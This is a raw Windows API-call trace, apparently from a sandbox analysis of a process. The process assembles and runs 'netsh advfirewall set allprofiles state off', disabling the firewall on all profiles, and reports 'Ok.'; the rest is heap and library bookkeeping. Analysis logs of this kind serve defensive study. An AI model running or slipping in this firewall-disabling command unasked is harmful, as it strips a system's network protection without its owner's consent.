0x3471c0 [0188.447] wcscpy_s (in: _Destination=0x3471c0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3589b0 | out: hHeap=0x2d0000) returned 1 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x347140 | out: hHeap=0x2d0000) returned 1 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x347140 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31ddb0 [0188.447] wcscpy_s (in: _Destination=0x31ddb0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31dd80 | out: hHeap=0x2d0000) returned 1 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3588f0 | out: hHeap=0x2d0000) returned 1 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x3588f0 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x3589b0 [0188.447] wcscpy_s (in: _Destination=0x3589b0, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358930 | out: hHeap=0x2d0000) returned 1 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358910 | out: hHeap=0x2d0000) returned 1 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358910 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x358930 [0188.447] wcscpy_s (in: _Destination=0x358930, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358970 | out: hHeap=0x2d0000) returned 1 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358950 | out: hHeap=0x2d0000) returned 1 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358950 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31dd80 [0188.448] wcscpy_s (in: _Destination=0x31dd80, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31dda0 | out: hHeap=0x2d0000) returned 1 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358990 | out: hHeap=0x2d0000) returned 1 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x30) returned 0x35a310 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x358990 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358970 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31dda0 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x3589d0 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x3589f0 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31ddc0 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x358a10 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x358a10, Size=0xe) returned 0x358a30 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x358a30, Size=0x24) returned 0x356bc0 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x356bc0, Size=0x26) returned 0x356bf0 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x356bf0, Size=0x2c) returned 0x35a350 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x35a350, Size=0x2e) returned 0x35a390 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.448] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x35a390, Size=0x44) returned 0x33cc90 [0188.448] GetProcessHeap () returned 0x2d0000 [0188.449] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x33cc90, Size=0x46) returned 0x33cce0 [0188.449] GetProcessHeap () returned 0x2d0000 [0188.449] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x33cce0, Size=0x50) returned 0x33d9d0 [0188.449] GetProcessHeap () returned 0x2d0000 [0188.449] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x33d9d0, Size=0x52) returned 0x33da90 [0188.449] GetProcessHeap () returned 0x2d0000 [0188.449] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x33da90, Size=0x58) returned 0x33d9d0 [0188.453] GetProcessHeap () returned 0x2d0000 [0188.453] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x33d9d0 | out: hHeap=0x2d0000) returned 1 [0188.453] _wcsnicmp (_String1="Advfirewall", _String2="dump", _MaxCount=0xb) returned -3 [0188.453] _wcsnicmp (_String1="Advfirewall", _String2="help", _MaxCount=0xb) returned -7 [0188.453] _wcsnicmp (_String1="Advfirewall", _String2="?", _MaxCount=0xb) returned 34 [0188.453] _wcsnicmp (_String1="Advfirewall", _String2="exec", _MaxCount=0xb) returned -4 [0188.453] _wcsnicmp (_String1="Advfirewall", _String2="advfirewall", _MaxCount=0xb) returned 0 [0188.453] GetProcessHeap () returned 0x2d0000 [0188.453] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358a30 [0188.453] GetProcessHeap () returned 0x2d0000 [0188.453] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358a10 [0188.453] GetProcessHeap () returned 0x2d0000 [0188.453] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x58) returned 0x33d9d0 [0188.453] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358a50 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x358a70 [0188.454] wcscpy_s (in: _Destination=0x358a70, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358a90 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358ab0 [0188.454] wcscpy_s (in: _Destination=0x358ab0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358ad0 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31ddd0 [0188.454] wcscpy_s (in: _Destination=0x31ddd0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358af0 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358b10 [0188.454] wcscpy_s (in: _Destination=0x358b10, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358b30 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x358b50 [0188.454] wcscpy_s (in: _Destination=0x358b50, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358b70 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31dde0 [0188.454] wcscpy_s (in: _Destination=0x31dde0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x33d9d0 | out: hHeap=0x2d0000) returned 1 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358a10 | out: hHeap=0x2d0000) returned 1 [0188.454] GetProcessHeap () returned 0x2d0000 [0188.454] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358ab0 | out: hHeap=0x2d0000) returned 1 [0188.455] GetProcessHeap () returned 0x2d0000 [0188.455] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358ab0 [0188.455] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0188.455] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0188.455] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0188.455] _wcsnicmp (_String1="set", _String2="res", _MaxCount=0x3) returned 1 [0188.455] _wcsnicmp (_String1="set", _String2="imp", _MaxCount=0x3) returned 10 [0188.455] _wcsnicmp (_String1="set", _String2="exp", _MaxCount=0x3) returned 14 [0188.455] _wcsnicmp (_String1="set", _String2="con", _MaxCount=0x3) returned 16 [0188.455] _wcsnicmp (_String1="set", _String2="fir", _MaxCount=0x3) returned 13 [0188.455] _wcsnicmp (_String1="set", _String2="mai", _MaxCount=0x3) returned 6 [0188.455] _wcsnicmp (_String1="set", _String2="mon", _MaxCount=0x3) returned 6 [0188.455] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0188.455] _wcsnicmp (_String1="allprofiles", _String2="help", _MaxCount=0xb) returned -7 [0188.455] _wcsnicmp (_String1="allprofiles", _String2="?", _MaxCount=0xb) returned 34 [0188.455] wcstok (in: _String="domainprofile", _Delimiter=" ", _Context=0x1e6610 | out: _String="domainprofile", _Context=0x1e6610) returned="domainprofile" [0188.455] _wcsnicmp (_String1="allprofiles", _String2="domainprofi", _MaxCount=0xb) returned -3 [0188.455] wcstok (in: _String="privateprofile", _Delimiter=" ", _Context=0x1e6640 | out: _String="privateprofile", _Context=0x1e6640) returned="privateprofile" [0188.455] _wcsnicmp (_String1="allprofiles", _String2="privateprof", _MaxCount=0xb) returned -15 [0188.455] wcstok (in: _String="publicprofile", _Delimiter=" ", _Context=0x1e6670 | out: _String="publicprofile", _Context=0x1e6670) returned="publicprofile" [0188.455] _wcsnicmp (_String1="allprofiles", _String2="publicprofi", _MaxCount=0xb) returned -15 [0188.455] wcstok (in: _String="currentprofile", _Delimiter=" ", _Context=0x1e66a0 | out: _String="currentprofile", _Context=0x1e66a0) returned="currentprofile" [0188.455] _wcsnicmp (_String1="allprofiles", _String2="currentprof", _MaxCount=0xb) returned -2 [0188.455] wcstok (in: _String="allprofiles", _Delimiter=" ", _Context=0x1dc370*=0x0 | out: _String="allprofiles", _Context=0x1dc370*=0x0) returned="allprofiles" [0188.455] _wcsnicmp (_String1="allprofiles", _String2="allprofiles", _MaxCount=0xb) returned 0 [0188.455] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned 0x0 [0194.015] LoadStringW (in: hInstance=0x0, uID=0x2, lpBuffer=0x123550, cchBufferMax=8192 | out: lpBuffer="Ok.\n") returned 0x4 [0194.015] FormatMessageW (in: dwFlags=0x500, lpSource=0x123550, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x123530, nSize=0x0, Arguments=0x123540 | out: lpBuffer="峠4") returned 0x5 [0194.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0194.016] GetConsoleOutputCP () returned 0x1b5 [0194.016] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0194.016] GetProcessHeap () returned 0x2d0000 [0194.016] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x6) returned 0x31ddf0 [0194.016] GetConsoleOutputCP () returned 0x1b5 [0194.016] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x31ddf0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ok.\r\n", lpUsedDefaultChar=0x0) returned 6 [0194.016] WriteFile (in: hFile=0x7, lpBuffer=0x31ddf0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x1234e0, lpOverlapped=0x0 | out: lpBuffer=0x31ddf0*, lpNumberOfBytesWritten=0x1234e0*=0x5, lpOverlapped=0x0) returned 1 [0194.017] GetProcessHeap () returned 0x2d0000 [0194.017] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31ddf0 | out: hHeap=0x2d0000) returned 1 [0194.017] LocalFree (hMem=0x345ce0) returned 0x0 [0194.017] FormatMessageW (in: dwFlags=0x500, lpSource=0xd01504, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x127560, nSize=0x0, Arguments=0x127570 | out: lpBuffer="訐5") returned 0x2 [0194.017] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0194.017] GetConsoleOutputCP () returned 0x1b5 [0194.017] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0194.017] GetProcessHeap () returned 0x2d0000 [0194.017] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x3) returned 0x31ddf0 [0194.017] GetConsoleOutputCP () returned 0x1b5 [0194.018] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x31ddf0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0194.018] WriteFile (in: hFile=0x7, lpBuffer=0x31ddf0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x127510, lpOverlapped=0x0 | out: lpBuffer=0x31ddf0*, lpNumberOfBytesWritten=0x127510*=0x2, lpOverlapped=0x0) returned 1 [0194.018] GetProcessHeap () returned 0x2d0000 [0194.018] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31ddf0 | out: hHeap=0x2d0000) returned 1 [0194.018] LocalFree (hMem=0x358a10) returned 0x0 [0194.018] GetProcessHeap () returned 0x2d0000 [0194.018] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358990 | out: hHeap=0x2d0000) returned 1 [0194.018] GetProcessHeap () returned 0x2d0000 [0194.018] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358970 | out: hHeap=0x2d0000) returned 1 [0194.018] GetProcessHeap () returned 0x2d0000 [0194.018] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31dda0 | out: hHeap=0x2d0000) returned 1 [0194.018] GetProcessHeap () returned 0x2d0000 [0194.018] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3589d0 | out: hHeap=0x2d0000) returned 1 [0194.018] GetProcessHeap () returned 0x2d0000 [0194.018] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3589f0 | out: hHeap=0x2d0000) returned 1 [0194.018] GetProcessHeap () returned 0x2d0000 [0194.018] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31ddc0 | out: hHeap=0x2d0000) returned 1 [0194.018] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35a310 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3471c0 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3471a0 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31ddb0 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x347140 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3589b0 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3588f0 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358930 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358910 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31dd80 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358950 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x347120 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x347180 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x347160 | out: hHeap=0x2d0000) returned 1 [0194.019] GetProcessHeap () returned 0x2d0000 [0194.019] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x347100 | out: hHeap=0x2d0000) returned 1 [0195.295] GetProcessHeap () returned 0x2d0000 [0195.295] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32f410 | out: hHeap=0x2d0000) returned 1 [0195.296] FreeLibrary (hLibModule=0xd00000) returned 1 [0195.296] FreeLibrary (hLibModule=0x7fef2e80000) returned 1 [0195.300] free (_Block=0x1d7e00) [0195.301] LocalFree (hMem=0x2f4550) returned 0x0 [0195.302] LocalFree (hMem=0x2f48a0) returned 0x0 [0195.302] LocalFree (hMem=0x2f49b0) returned 0x0 [0195.302] LocalFree (hMem=0x2f3050) returned 0x0 [0195.302] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x357740 [0195.302] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2f3050 [0195.302] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x3568f0 [0195.302] free (_Block=0x1d5a70) [0195.302] free (_Block=0x0) [0195.302] free (_Block=0x3ddfa0) [0195.302] free (_Block=0x1d5a90) [0195.302] free (_Block=0x1d7de0) [0195.302] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x35d770 [0195.308] LocalFree (hMem=0x35d770) returned 0x0 [0195.308] LocalFree (hMem=0x2f49d0) returned 0x0 [0195.308] LocalFree (hMem=0x357740) returned 0x0 [0195.308] free (_Block=0x1d7bd0) [0195.309] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x7fefdee0000 [0195.309] FreeLibrary (hLibModule=0x7fefdee0000) returned 1 [0195.309] LocalFree (hMem=0x3568f0) returned 0x0 [0195.309] LocalFree (hMem=0x2f3050) returned 0x0 [0195.309] GlobalHandle (pMem=0x2f4330) returned 0x7f0008 [0195.310] GlobalUnlock (hMem=0x7f0008) returned 0 [0195.319] FreeLibrary (hLibModule=0x7fef2f60000) returned 1 [0195.320] FreeLibrary (hLibModule=0x7fef3400000) returned 1 [0195.324] FreeLibrary (hLibModule=0x7fef33f0000) returned 1 [0195.326] FreeLibrary (hLibModule=0x7fef33a0000) returned 1 [0195.327] FreeLibrary (hLibModule=0x7fef3260000) returned 1 [0195.328] FreeLibrary (hLibModule=0x7fef2cb0000) returned 1 [0195.332] FreeLibrary (hLibModule=0x7fef3230000) returned 1 [0195.333] FreeLibrary (hLibModule=0x7fef2f20000) returned 1 [0195.336] FreeLibrary (hLibModule=0x7fef3220000) returned 1 [0195.338] FreeLibrary (hLibModule=0x7fef3210000) returned 1 [0195.342] FreeLibrary (hLibModule=0x7fef2f10000) returned 1 [0195.344] FreeLibrary (hLibModule=0x7fef2c90000) returned 1 [0195.345] FreeLibrary (hLibModule=0x7fef29a0000) returned 1 [0195.350] FreeLibrary (hLibModule=0x7fef28a0000) returned 1 [0195.363] FreeLibrary (hLibModule=0x7fef26d0000) returned 1 [0195.368] FreeLibrary (hLibModule=0x7fef2680000) returned 1 [0195.369] FreeLibrary (hLibModule=0x7fef2650000) returned 1 [0196.219] FreeLibrary (hLibModule=0x7fef2550000) returned 1 [0196.220] FreeLibrary (hLibModule=0x7fef2520000) returned 1 [0196.232] FreeLibrary (hLibModule=0x7fef50b0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3251b0 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f07a0 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f07c0 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f07e0 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0800 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0820 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0840 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0890 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f08b0 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f08d0 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f08f0 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0910 | out: hHeap=0x2d0000) returned 1 [0196.234] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0930 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0950 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0970 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0990 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f09b0 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f09d0 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f09f0 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0a10 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0a30 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0a50 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0a70 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0a90 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0ab0 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0ad0 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0af0 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0b10 | out: hHeap=0x2d0000) returned 1 [0196.235] 